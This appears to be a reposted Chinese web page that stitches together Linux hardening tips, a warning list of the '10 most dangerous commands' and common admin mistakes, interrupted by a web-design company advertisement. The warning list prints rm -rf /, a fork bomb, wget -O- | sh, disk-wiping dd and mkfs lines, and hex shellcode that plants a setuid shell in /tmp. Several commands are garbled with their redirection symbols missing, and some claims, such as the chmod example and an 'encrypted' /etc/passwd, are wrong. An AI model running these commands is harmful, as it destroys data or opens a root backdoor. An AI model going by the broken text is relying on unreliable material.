但由于該操作系統是一個多用戶操作系統,黑客們為了在攻擊中隱藏自己,往往會選擇 Linux作為首先攻擊的對象。那么,作為一名Linux用戶,我們該如何通過合理的方法來防范Linux的安全呢?下面筆者搜集和整理了一些防范 Linux安全的幾則措施,現在把它們貢獻出來,懇請各位網友能不斷補充和完善。 1、禁止使用Ping命令Ping命令是計算機之間進行相互檢測線路完好的一個應用程序,計算機間交流數據的傳輸沒有 經過任何的加密處理,因此我們在用ping命令來檢測某一個服務器時,可能在因特網上存在某個非法分子,通過專門的黑客程序把在網絡線路上傳輸的信息中途 竊取,并利用偷盜過來的信息對指定的服務器或者系統進行攻擊,為此我們有必要在Linux系統中禁止使用Linux命令。在Linux里,如果要想使 ping沒反應也就是用來忽略icmp包,因此我們可以在Linux的命令行中輸入如下命令: echo 1 /proc/sys/net/ipv4/icmp_echo_igore_all 如果想恢復使用ping命令,就可以輸入 echo 0 /proc/sys/net/ipv4/icmp_echo_igore_all2、注意對系統及時備份為了防止系統在使用的過程中發生以外情況而難以正常運行,我們應該對Linux完好的系統進 行備份,最好是在一完成Linux系統的安裝任務后就對整個系統進行備份,以后可以根據這個備份來驗證系統的完整性,這樣就可以發現系統文件是否被非法修 改過。如果發生系統文件已經被破壞的情況,也可以使用系統備份來恢復到正常的狀態。備份信息時,我們可以把完好的系統信息備份在CD-ROM光盤上,以后 可以定期將系統與光盤內容進行比較以驗證系統的完整性是否遭到破壞。如果對安全級別的要求特別高,那么可以將光盤設置為可啟動的并且將驗證工作作為系統啟 動過程的一部分。這樣只要可以通過光盤啟動,就說明系統尚未被破壞過。 3、改進登錄服務器將系統的登錄服務器移到一個單獨的機器中會增加系統的安全級別,使用一個更安全的登錄服務器 來取代Linux自身的登錄工具也可以進一步提高安全。在大的Linux網絡中,最好使用一個單獨的登錄服務器用于syslog服務。它必須是一個能夠滿 足所有系統登錄需求并且擁有足夠的磁盤空間的服務器系統,在這個系統上應該沒有其它的服務運行。更安全的登錄服務器會大大削弱入侵者透過登錄系統竄改日志 文件的能力。 4、取消Root命令歷史記錄在Linux下,系統會自動記錄用戶輸入過的命令,而root用戶發出的命令往往具有敏感的 信息,為了保證安全性,一般應該不記錄或者少記錄root的命令歷史記錄。為了設置系統不記錄每個人執行過的命令,我們可以在Linux的命令行下,首先 用cd命令進入到/etc命令,然后用編輯命令來打開該目錄下面的profile文件,并在其中輸入如下內容: HISTFILESIZE=0
我們提供的服務有:成都網站設計、成都網站建設、微信公眾號開發、網站優化、網站認證、東河ssl等。為上千余家企事業單位解決了網站和推廣的問題。提供周到的售前咨詢和貼心的售后服務,是有科學管理、有技術的東河網站制作公司
HISTSIZE=0當然,我們也可以直接在命令行中輸入如下命令: ln -s /dev/null ~/.bash_history5、為關鍵分區建立只讀屬性Linux的文件系統可以分成幾個主要的分區,每個分區分別進行不同的配置和安裝,一般情況 下至少要建立/、/usr/local、/var和/home等分區。/usr可以安裝成只讀并且可以被認為是不可修改的。如果/usr中有任何文件發生 了改變,那么系統將立即發出安全報警。當然這不包括用戶自己改變/usr中的內容。/lib、/boot和/sbin的安裝和設置也一樣。在安裝時應該盡 量將它們設置為只讀,并且對它們的文件、目錄和屬性進行的任何修改都會導致系統報警。 當然將所有主要的分區都設置為只讀是不可能的,有的分區如/var等,其自身的性質就決定了不能將它們設置為只讀,但應該不允許它具有執行權限。 6、殺掉攻擊者的所有進程假設我們從系統的日志文件中發現了一個用戶從我們未知的主機登錄,而且我們確定該用戶在這臺 主機上沒有相應的帳號,這表明此時我們正在受到攻擊。為了保證系統的安全被進一步破壞,我們應該馬上鎖住指定的帳號,如果攻擊者已經登錄到指定的系統,我 們應該馬上斷開主機與網絡的物理連接。如有可能,我們還要進一步查看此用戶的歷史記錄,再仔細查看一下其他用戶是否也已經被假冒,攻擊者是否擁有有限權 限;最后應該殺掉此用戶的所有進程,并把此主機的IP地址掩碼加入到文件hosts.deny中。 7、改進系統內部安全機制我們可以通過改進Linux操作系統的內部功能來防止緩沖區溢出,從而達到增強Linux系 統內部安全機制的目的,大大提高了整個系統的安全性。但緩沖區溢出實施起來是相當困難的,因為入侵者必須能夠判斷潛在的緩沖區溢出何時會出現以及它在內存 中的什么位置出現。緩沖區溢出預防起來也十分困難,系統管理員必須完全去掉緩沖區溢出存在的條件才能防止這種方式的攻擊。正因為如此,許多人甚至包括 Linux Torvalds本人也認為這個安全Linux補丁十分重要,因為它防止了所有使用緩沖區溢出的攻擊。但是需要引起注意的是,這些補丁也會導致對執行棧的 某些程序和庫的依賴問題,這些問題也給系統管理員帶來的新的挑戰。 8、對系統進行跟蹤記錄為了能密切地監視黑客的攻擊活動,我們應該啟動日志文件,來記錄系統的運行情況,當黑客在攻 擊系統時,它的蛛絲馬跡都會被記錄在日志文件中的,因此有許多黑客在開始攻擊系統時,往往首先通過修改系統的日志文件,來隱藏自己的行蹤,為此我們必須限 制對/var/log文件的訪問,禁止一般權限的用戶去查看日志文件。當然,系統中內置的日志管理程序功能可能不是太強,我們應該采用專門的日志程序,來 觀察那些可疑的多次連接嘗試。另外,我們還要小心保護好具有根權限的密碼和用戶,因為黑客一旦知道了這些具有根權限的帳號后,他們就可以修改日志文件來隱 藏其蹤跡了。 9、使用專用程序來防范安全有時,我們通過人工的方法來監視系統的安全比較麻煩,或者是不周密,因此我們還可以通過專業 程序來防范系統的安全,目前最典型的方法為設置陷井和設置蜜罐兩種方法。所謂陷井就是激活時能夠觸發報警事件的軟件,而蜜罐(honey pot)程序是指設計來引誘有入侵企圖者觸發專門的報警的陷井程序。通過設置陷井和蜜罐程序,一旦出現入侵事件系統可以很快發出報警。在許多大的網絡中, 一般都設計有專門的陷井程序。陷井程序一般分為兩種:一種是只發現入侵者而不對其采取報復行動,另一種是同時采取報復行動。 10、將入侵消滅在萌芽狀態入侵者進行攻擊之前最常做的一件事情就是端號掃瞄,如果能夠及時發現和阻止入侵者的端號掃瞄 行為,那么可以大大減少入侵事件的發生率。反應系統可以是一個簡單的狀態檢查包過濾器,也可以是一個復雜的入侵檢測系統或可配置的防火墻。我們可以采用諸 如Abacus Port Sentry這樣專業的工具,來監視網絡接口并且與防火墻交互操作,最終達到關閉端口掃瞄攻擊的目的。當發生正在進行的端口掃瞄時,Abacus Sentry可以迅速阻止它繼續執行。但是如果配置不當,它也可能允許敵意的外部者在你的系統中安裝拒絕服務攻擊。正確地使用這個軟件將能夠有效地防止對 端號大量的并行掃瞄并且阻止所有這樣的入侵者。 11、嚴格管理好口令前面我們也曾經說到過,黑客一旦獲取具有根權限的帳號時,就可以對系統進行任意的破壞和攻 擊,因此我們必須保護好系統的操作口令。通常用戶的口令是保存在文件/etc/passwd文件中的,盡管/etc/passwd是一個經過加密的文件, 但黑客們可以通過許多專用的搜索方法來查找口令,如果我們的口令選擇不當,就很容易被黑客搜索到。因此,我們一定要選擇一個確保不容易被搜索的口令。另外,我們最好能安裝一個口令過濾工具,并借用該工具來幫助自己檢查設置的口令是否耐得住攻擊。
Linux中最危險的10個命令
對于編程人員或或者Linux系統管理員來說,操作Linux系統最常見的方法就是使用命令行。當然,Linux命令行佷有用、很高效,但有時候也很危險,尤其是在你誤操作或者不確定你自己在正在做什么的時候。下面我就為大家盤點最危險是10個命令,一起來看看吧!
當然,以下命令通常都是在root權限下才能將愚蠢發揮到無可救藥;在普 通用戶身份下,破壞的只是自己的一畝三分地。
1. rm -rf 命令
rm -rf命令是刪除文件夾及其內容最快的方式之一。僅僅一丁點的敲錯或無知都可能導致不可恢復的系統崩壞。下列是一些rm 命令的選項。
rm 命令在Linux下通常用來刪除文件。
rm -r 命令遞歸的刪除文件夾,甚至是空的文件夾。(譯注:個人認為此處應該是說錯了,從常識看,應該是“甚至是非空的文件夾”)
rm -f 命令能不經過詢問直接刪除‘只讀文件’。(譯注:Linux下刪除文件并不在乎該文件是否是只讀的,而只是在意其父目錄是否有寫權限。所以,-f這個參數 只是表示不必一個個刪除確認,而是一律悄悄刪除。另外,原始的rm命令其實也是沒有刪除提示的,只是一般的發行版都會將rm通過別名的方式增加-i參數來 要求刪除確認,而-f則抑制了這個提示。)
rm -rf / : 強制刪除根目錄下所有東東。(就是說刪除完畢后,什么也沒有了。。。)
rm -rf *: 強制刪除當前目錄的所有文件。
rm -rf . : 強制刪除當前文件夾及其子文件夾。
從 現在起,當你要執行rm -rf命令時請留心一點。我們可以在“.bashrc”文件對‘rm‘命令創建rm -i的別名,來預防用 ‘rm‘命令刪除文件時的事故,它會要求你確認每一個刪除請求。(譯注:大多數發行版已經這樣做了,如果還沒有,請這樣做,并在使用-f參數前一定考慮好 你在做什么!譯者本人有著血淚的教訓啊。)
2. :(){:|:};: 命令
這就是個fork 炸彈的實例。具體操作是通過定義一個名為 ‘:‘的函數,它會調用自己兩次,一次在前臺另一次運行在后臺。它會反復的執行下去直到系統崩潰。
:(){:|:};:
哦?你確認你要試試么?千萬別在公司正式的服務器上實驗啊~~
3. 命令 /dev/sda
上列命令會將某個‘命令‘的輸出寫到塊設備/dev/sda中。該操作會將在塊設備中的所有數據塊替換為命令寫入的原始數據,從而導致整個塊設備的數據丟失。
4. mv 文件夾 /dev/null
這 個命令會移動某個‘文件夾‘到/dev/null。在Linux中 /dev/null 或 null 設備是一個特殊的文件,所有寫入它的數據都會被清除,然后返回寫操作成功。(譯注:這就是黑洞啊。當然,要說明的是,通過將文件夾移動到黑洞,并不能阻止 數據恢復軟件的救贖,所以,真正的`徹底毀滅,需要采用專用的軟件或者手法來完成——我知道你肯定有些東西想刪除得干干凈凈的。)
# mv /home/user/* /dev/null
上列命令會將User目錄所有內容移動到/dev/null,這意味著所有東西都被‘卷入’黑洞 (null)之中。
5. wget -O- | sh
上列命令會從一個(也許是)惡意源下載一個腳本并執行。Wget命令會下載這個腳本,而sh會(無條件的)執行下載下來的腳本。
注意: 你應該時刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。(譯注:所以,你真的知道你在做什么嗎?當遇到這種需要是,我的做法是,先wget下來,然后我去讀一讀其中到底寫了些什么,然后考慮是否執行。)
6. mkfs.ext3 /dev/sda
上列命令會格式化塊設備‘sda’,你無疑知道在執行上列命令后你的塊設備(硬盤驅 動器)會被格式化,嶄新的!沒有任何數據,直接讓你的系統達到不可恢復的階段。(譯注:通常不會直接使用/dev/sda這樣的設備,除非是作為raw設 備使用,一般都需要將sda分成類似sda1、sda2這樣的分區后才使用。當然,無論你使用sda還是sda1,這樣對塊設備或分區進行mkfs都是毀 滅性的,上面的數據都會被蒸發了。)
7. file
上列命令常用來清空文件內容(譯注:通常也用于記錄命令輸出。 不過請在執行前,確認輸出的文件是空的或者還不存在,否則原來的文件可真是恢復不了了——連數據恢復軟件都未必能幫助你了。另外,我想你可能真正想用的是 “”,即累加新的輸出到文件,而不是刷新那個文件。)。如果用上列執行時輸入錯誤或無知的輸入類似 “xt.conf” 的命令會覆蓋配置文件或其他任何的系統配置文件。
8. ^foo^bar
這個命令在“鮮為人知而又實用的 Linux 命令大全:”中描述過,用來編輯先前運行的命令而無需重打整個命令。但當用foobar命令時如果你沒有徹底檢查改變原始命令的風險,這可能導致真正的麻煩。(譯注:事實上,這種小技巧是譯者認為的,少數史前時代遺留下來的無用而有害的“黑客”技巧。)
9. dd if=/dev/random of=/dev/sda
上列命令會向塊設備sda寫入隨機的垃圾文件從而擦出數據。當然!你的系統可能陷入混亂和不可恢復的狀態。(譯注:記得上面說過mv到黑洞并不能徹底刪除數據么?那么這個命令就是給了你一個徹底刪除的方法!當然為了保險起見,你可以覆寫多次。)
10. 隱藏命令
下面的命令其實就是上面第一個命令 (rm -rf)。這里的代碼是隱藏在十六進制里的,一個無知的用戶可能就會被愚弄。在終端里運行下面命令可能會擦除你的根分區。
這個命令表明通常真正的危險是隱藏的,不會被輕易的檢測到。你必須時刻留心你在做什么結果會怎樣。不要編譯/運行從未知來源的代碼。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同學或學校的電腦里的Linux終端或Shell執行以上的任何一個命令,因為這將導致數據丟失或者系統崩潰。如果你想測試它們,請在虛擬機上運行。
;
linux管理常見錯誤一:隨意許可,原因是不理解許可
如果對許可配置不當,就會給黑客留下機會。處理許可問題的最簡單方法是使用所謂的RWE方法,即Read(讀取)、Write(寫入)、Execute(執行)。假設你想讓一個用戶能夠讀取一個文件但不能寫入文件。為此,你可以執行:chmod
u+w,u-rx 文件名,一些新用戶可能會看到一個錯誤,說他們沒有使用文件的許可,因此他們就使用了:Chmod 777
文件名,以為這樣能夠避免問題。但這樣做實際上會導致更多的問題,因為它給了文件的可執行的權限。
記住這一點:777將一個文件的讀取、寫入、執行的許可給了所有用戶,666將一個文件的讀取、寫入權限給了所有用戶,而555將文件的讀取、執行權限給了所有用戶,還有444、333、222、111等等。
linux管理常見錯誤二:忽視更新
這并不是說Linux管理員缺乏技巧。不過,許多Linux管理員在運行了Linux之后,以為日后就無事可做了,以為它安全可靠。其實,新的更新可以為一些新的漏洞打上補丁。維持更新可以在一個易受損的系統與一個安全的系統之間構造分水嶺。Linux的安全來自于不斷地維護。為了實現安全性,為了使用一些新的特性和穩定性,任何管理員都應當跟上Linux的更新步伐。
linux管理常見錯誤三:不經過嚴格審核,從多種渠道下載安裝各種類型的應用程序
乍看起來,這也許是一個不錯的主意。如果你在運行Ubuntu,你會知道包管理程序使用的是。deb軟件包。不過,你找到的許多應用程序是以源代碼的形式提供的。沒有問題嗎?這些程序安裝后也許能夠正常工作。但是你為什么不能隨意安裝程序呢?道理很簡單,如果你以源的形式安裝了程序,那么,你的軟件包管理系統將無法跟蹤你所安裝的東西。
因此,在程序包A(以源的形式安裝)依賴于程序包B(從一個。deb庫安裝的),而軟件包B是從更新管理器更新的時候,會發生什么事情呢?程序包A可能運行,也可能無法運行。不過,如果程序包A和B都從。deb庫安裝的話,二者都能運行的機會將更高。此外,在所有的程序包都來自于同樣的二進制類型時,更新程序包將更為容易。
linux管理常見錯誤四:將服務器啟動進入到X
在一臺機器是專用服務器時,你可能會想到安裝X,這樣一些管理任務就會簡單一些。不過,這并不意味著用戶需要將服務器啟動進入到X.這樣會浪費珍貴的內存和CPU資源。相反地,你應當在級別3上停止啟動過程,進入命令行模式。這樣做不但會將所有的資源留給服務器,而且還會防止泄露機器的機密。要登錄到X,用戶只需要以命令行方式登錄,然后鍵入startx進入到桌面。
linux管理常見錯誤五:糟糕的口令
記住,root
的口令通常是linux王國的關鍵。所以為什么要讓root的口令那么容易被破解呢?保障你的用戶口令的健壯性至關重要。如果你的口令比較長,且難于記憶,可將這個口令存放在一個可被加密的位置。在需要這個口令時,可用解密軟件解開這個口令使用之。
linux管理常見錯誤六:沒有備份關鍵的配置文件
許多管理員都有這樣的體會,在升級到某個X版本,如X11之后,卻發現新版本破壞了你的xorg.conf配置文件,以至于你再也無法使用X?建議你在升級X之前,先對以前的/etc/x11/xorg.conf作一個備份,以免升級失敗。當然,X的升級程序會設法為用戶備份xorg.conf文件,但它卻在/etc/x11目錄內備份。即使這種備份看起來不錯,你最好還是自己做一個備份吧。筆者的一個習慣是將其備份到/root目錄中,這樣,用戶就可以知道只有根(root)用戶能夠訪問此文件。記住,安全第一。這里的方法也適用于其它的關鍵備份,如Samba、Apache、Mysql等。
linux管理常見錯誤七:忽視日志文件
/var/log的存在是有理由的。這是存放所有的日志文件的唯一位置。在發生問題時,你首先需要看一下這里。檢查安全問題,可看一下/var/log/secure.筆者看的第一個位置是/var/log/messages.這個日志文件保存著所有的一般性錯誤。在此文件中,你可以得到關于網絡、媒體變更等消息。在管理一臺機器時,用戶可以使用某個第三方的應用程序,如logwatch,這樣就可以創建為用戶創建基于/var/log文件的各種報告。
linux管理常見錯誤八:沒有安裝一個可正常運行的內核
你可能不會在一臺機器上安裝10個以上的內核。但你需要更新內核,這種更新并沒有刪除以前的內核。你是怎么做的呢?你一直保持使用最近的可正常工作的內核。假設你目前正常工作的內核是2.6.22,而2.6.20是備份內核。如果你更新到2.6.26,而在新內核中一切都工作正常,你就可以刪除2.6.20了。
linux管理常見錯誤九:逃避使用命令行
恐怕很少有人愿意記住那么多命令。在大多數情況下,圖形用戶界面是許多人的最愛。不過,有時,命令行使用起來更加容易、快捷、安全、可靠。逃避使用命令行是Linux管理的大忌。管理員至少應當理解命令行是如何工作的,至少還要掌握一些重要的管理命令。
linux管理常見錯誤十:以根用戶身份登錄
這是一種很危險的錯誤。如果用戶需要根特權來執行或配置一個應用程序,可以在一個標準的用戶賬戶中使用su切換到root用戶。登錄到root為什么不是一件好事兒?在用戶以標準用戶身份登錄時,所有正在運行的X應用程序仍擁有僅限于此用戶的訪問權。如果用戶以根用戶身份登錄,X就擁有了root的許可。這就會導致兩個問題,一、如果用戶由GUI犯了一個大錯,這個錯誤對系統來說,有可能是一個巨大的災難。二、以根用戶的身份運行X使得系統更易于遭受攻擊。
分享名稱:linux不安全命令,命令可以在linux的安全系統中
當前URL:http://vcdvsql.cn/article28/hshpjp.html
成都網站建設公司_創新互聯,為您提供網站建設、網頁設計公司、自適應網站、企業建站、小程序開發、網站收錄
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯